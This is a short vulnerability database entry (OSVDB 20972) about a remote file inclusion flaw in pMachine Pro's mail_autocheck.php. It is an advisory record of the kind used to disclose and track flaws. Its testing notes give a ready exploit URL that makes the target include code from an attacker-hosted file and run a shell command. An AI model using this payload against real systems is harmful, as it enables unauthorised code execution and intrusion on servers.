pMachine Pro mail_autocheck.php pm_path Variable Remote File Inclusion

2005-11-16T12:42:15
ID OSVDB:20972
Type osvdb
Reporter OSVDB
Modified 2005-11-16T12:42:15

Description

Manual Testing Notes

http://[target]/mail_this_entry/mail_autocheck.php?pm_path=http://[attacker]/CMD.gif?&cmd=ls

References:

Vendor URL: http://www.pmachine.com/ Bugtraq ID: 15473